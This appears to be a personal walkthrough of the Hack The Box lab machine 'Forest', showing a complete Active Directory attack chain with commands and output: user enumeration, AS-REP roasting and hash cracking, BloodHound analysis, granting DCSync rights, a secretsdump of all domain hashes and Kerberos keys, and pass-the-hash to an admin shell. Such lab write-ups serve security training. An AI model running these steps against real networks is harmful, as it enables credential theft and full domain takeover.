Forest

Task 1 – For which domain is this machine a Domain Controller?

I started by a nmap scan:

─(kali㉿kali)-[~/Desktop]
└─$ nmap -sV -sC -sT 10.129.3.218
Starting Nmap 7.95 ( <https://nmap.org> ) at 2026-02-13 19:13 CET
Nmap scan report for 10.129.3.218
Host is up (0.015s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-13 18:20:33Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-02-13T18:20:36
|_  start_date: 2026-02-13T18:17:33
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2026-02-13T10:20:35-08:00
|_clock-skew: mean: 2h46m51s, deviation: 4h37m08s, median: 6m50s

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 21.08 seconds

The SMB discovery script returned the domain: htb.local

Task 2 – Which of the following services allows for anonymous authentication and can provide us with valuable information about the machine? FTP, LDAP, SMB, WinRM

The question is a bit tricky because the majority of these services allows for anonymous authentication but only one can provide valuable information about the machine: LDAP

Task 3 – Which user has Kerberos Pre-Authentication disabled?

I tried first to enumerate shares however it was not possible. I then searched about LDAP enumeration and found this.

I tried then anonymous bind (no authentication):

ldapsearch -x -H ldap://target.com -b "dc=htb,dc=local"

I lost about half an hour trying to get a user with Pre-Authentication disabled. I moved from LDAP enumeration to rpcclient enumeration using the following command:

┌──(kali㉿kali)-[~/Desktop]
└─$ rpcclient -U "" -N 10.129.3.218

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

I then cleaned the resulst ang got the list of users:

Administrator
Guest
krbtgt
DefaultAccount
sebastien
lucinda
svc-alfresco
andy
mark
santi

I then user impacket script GetNPUsers.py that will search for users that have the property ‘Do not require kerberos preauthentication’

─(kali㉿kali)-[~/Desktop]
└─$ impacket-GetNPUsers htb.local/ -dc-ip 10.129.3.218 -no-pass -usersfile users.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:0a78d7f4f1f41b2ae0e875dc8c02a91b$ea21627b232b9c399e1db4a596186b0ff2fcc5689541a90edc01b80b631ff47b00fc0d96e16cc43cfe31b2dbd4d4740eeffee4d8eabf38693a8abb11aa9de7f357293c0fe658681cd9dd86e24c1b3bd36c3a13b0bc7e4b25e2d8bbf42193854bb61257a64b677090f0008a333cb91b38df1e24597019aa025cbd8ce632473096dea71bd54830b4aa14d7ba40bfbb0cde773c41fcb9c0cc6c1edd696c3221bc04b34d213a7b27ccd6045e69b061eb2ce0f04ce9ab558a55a4648a3d5d0a9f20f604846b581a50b2f6f33751f0d85535683f6a0baf7f307e66970d1632a53b51d5f0ef22b14b85
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set

And the user is svc-alfresco

Task 4 – What is the password of the user svc-alfresco?

I brute forced it using hashcat and rockyou.txt

──(kali㉿kali)-[~/Desktop]
└─$ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt

The result is s3rvice

──(kali㉿kali)-[~/Desktop]
└─$ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt --show
[email protected]:0a78d7f4f1f41b2ae0e875dc8c02a91b$ea21627b232b9c399e1db4a596186b0ff2fcc5689541a90edc01b80b631ff47b00fc0d96e16cc43cfe31b2dbd4d4740eeffee4d8eabf38693a8abb11aa9de7f357293c0fe658681cd9dd86e24c1b3bd36c3a13b0bc7e4b25e2d8bbf42193854bb61257a64b677090f0008a333cb91b38df1e24597019aa025cbd8ce632473096dea71bd54830b4aa14d7ba40bfbb0cde773c41fcb9c0cc6c1edd696c3221bc04b34d213a7b27ccd6045e69b061eb2ce0f04ce9ab558a55a4648a3d5d0a9f20f604846b581a50b2f6f33751f0d85535683f6a0baf7f307e66970d1632a53b51d5f0ef22b14b85:s3rvice

Task 5 – To what port can we connect with these creds to get an interactive shell?

We have port 5985 open, which is used for WinRM over HTTP. We can hence use evil-winrm to get a shell:

Task 7 – Which group has WriteDACL permissions over the HTB.LOCAL domain? Give the group name without the @htb.local

I directly thought about bloodhound. I will try bloodhound-python on kali linux

─(kali㉿kali)-[~/Desktop]
└─$ bloodhound-python -u svc-alfresco -p 's3rvice' -d htb.local -ns 10.129.3.218 -c All
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: htb.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (FOREST.htb.local:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Found 32 users
INFO: Found 76 groups
INFO: Found 2 gpos
INFO: Found 15 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: EXCH01.htb.local
INFO: Querying computer: FOREST.htb.local
INFO: Done in 00M 08S

I then started neo4j:

─(kali㉿kali)-[~/Desktop]
└─$ sudo neo4j start                       
[sudo] password for kali: 
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:58633). It is available at <http://localhost:7474>
There may be a short delay until the server is ready.

Then started bloodhound GUI

─(kali㉿kali)-[~/Desktop]
└─$ bloodhound

 Starting neo4j
Neo4j is running at pid 58633

 Bloodhound will start

 IMPORTANT: It will take time, please wait...

{"time":"2026-02-13T21:11:19.399708881+01:00","level":"INFO","message":"Reading configuration found at /etc/bhapi/bhapi.json"}
{"time":"2026-02-13T21:11:19.402964088+01:00","level":"INFO","message":"Logging configured"}
{"time":"2026-02-13T21:11:19.495424975+01:00","level":"INFO","message":"No database driver has been set for migration, using: neo4j"}
{"time":"2026-02-13T21:11:19.496503157+01:00","level":"INFO","message":"Connecting to graph using Neo4j"}
{"time":"2026-02-13T21:11:19.49829207+01:00","level":"INFO","message":"Starting daemon Tools API"}
{"time":"2026-02-13T21:11:19.543103357+01:00","level":"INFO","message":"No new SQL migrations to run"}
{"time":"2026-02-13T21:11:19.662812722+01:00","level":"ERROR","message":"Error generating AzureHound manifest file: error reading downloads directory /etc/bloodhound/collectors/azurehound: open /etc/bloodhound/collectors/azurehound: no such file or directory"}
{"time":"2026-02-13T21:11:19.662914851+01:00","level":"ERROR","message":"Error generating SharpHound manifest file: error reading downloads directory /etc/bloodhound/collectors/sharphound: open /etc/bloodhound/collectors/sharphound: no such file or directory"}
{"time":"2026-02-13T21:11:19.693272132+01:00","level":"INFO","message":"Analysis requested by init"}
{"time":"2026-02-13T21:11:19.701225176+01:00","level":"INFO","message":"Starting daemon API Daemon"}
{"time":"2026-02-13T21:11:19.701397813+01:00","level":"INFO","message":"Starting daemon Data Pruning Daemon"}
{"time":"2026-02-13T21:11:19.701455284+01:00","level":"INFO","message":"Starting daemon Data Pipe Daemon"}
{"time":"2026-02-13T21:11:19.701464423+01:00","level":"INFO","message":"Server started successfully"}
{"time":"2026-02-13T21:11:19.710668454+01:00","level":"INFO","message":"Running OrphanFileSweeper for path /var/lib/bhe/work/tmp"}
{"time":"2026-02-13T21:11:20.263832891+01:00","level":"INFO","message":"GET /","proto":"HTTP/1.1","referer":"","user_agent":"curl/8.17.0","request_bytes":0,"response_bytes":38,"status":301,"elapsed":1.941692,"request_id":"5700cbb1-f4af-42e8-9642-83d34c9992a2","request_ip":"127.0.0.1","remote_addr":"127.0.0.1:40996"}

 opening <http://127.0.0.1:8080>

I then upload the JSON results to Bloodhound and used this query:

MATCH (g)-[r:WriteDacl]->(d:Domain {name:"HTB.LOCAL"})
RETURN g,r,d

I got 3 groups that has writeDACLs on HTB.LOCAL domain

The answer is Exchange Windows Permissions

WriteDACL → Add DCSync → secretsdump

Task 8 – The user svc-alfresco is a member of a group that allows them to add themself to the “Exchange Windows Permissions” group. Which group is that?

I expanded Inbound Object Control of Exchange Windows Permissions and found that svc-alfresco is a member of Account Operators

Task 9 – Which of the following attacks you can perform to elevate your privileges with a user that has WriteDACL on the domain? PassTheHash, PassTheTicket, DCSync, KrbRelay

🔎 What this means for privilege escalation

If a group has WriteDACL on the domain object, members of that group can:

➡ modify the domain ACL

➡ grant themselves DCSync rights

➡ perform full domain compromise

Typical attack path:

We can have more information here about WriteDACL

Task 9 – Root Flag

I will try to add svc-alfresco to Exchange Windows Permissions since he is member of Account Operators and then I will try DCSync:

I first added the user svc-alfresco to Exchange Windows Permissions using the following PS Command:

Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members svc-alfresco

I then verified he was added using the following command:

Get-ADGroupMember "Exchange Windows Permissions"

Before doing so, let’s transfer PowerView.ps1. For this, I created a Python server on port 4444:

python3 -m http.server 4444

I then downloaded it using the following command:

Invoke-WebRequest -Uri "<http://10.10.15.41:4444/PowerView.ps1>" -OutFile "PowerView.ps1"

I was stuck somewhere so basing on the writeup, I created a new user john and gave me DCSync Rights:

$pass = ConvertTo-SecureString 'abc123!' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential -ArgumentList 'htb\\john', $pass

Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync

I then dumped the hashes using secretdump.py from my kali machine:

kali㉿kali)-[~/Desktop/Abdallah/Tools]
└─$ ./secretsdump.py htb.local/john:'abc123!'@10.129.2.75
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
john:10101:aad3b435b51404eeaad3b435b51404ee:44f077e27f6fef69e7bd834c7242b040:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:26ef47078c5fbde16279fa5e717e35a3:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\\santi:des-cbc-md5:4075ad528ab9e5fd
john:aes256-cts-hmac-sha1-96:d62a736f49f88defdf75b0d9dde229c06e610deab92f16551e66f4a48c034aaf
john:aes128-cts-hmac-sha1-96:cc9cf4f03dd5bc20ce617ce19a6c0f1d
john:des-cbc-md5:b5b657cdc86d2668
FOREST$:aes256-cts-hmac-sha1-96:8066a146891cede515848e8a68d2aa0056d13f5dc11dfe51c7b8240f3e933553
FOREST$:aes128-cts-hmac-sha1-96:66135962e94825da87d034da7e793904
FOREST$:des-cbc-md5:ad2fc8f776b91389
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up... 

I then passed the hash using the following command:

evil-winrm -i 10.129.2.75 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6

And got admin shell and got the flag: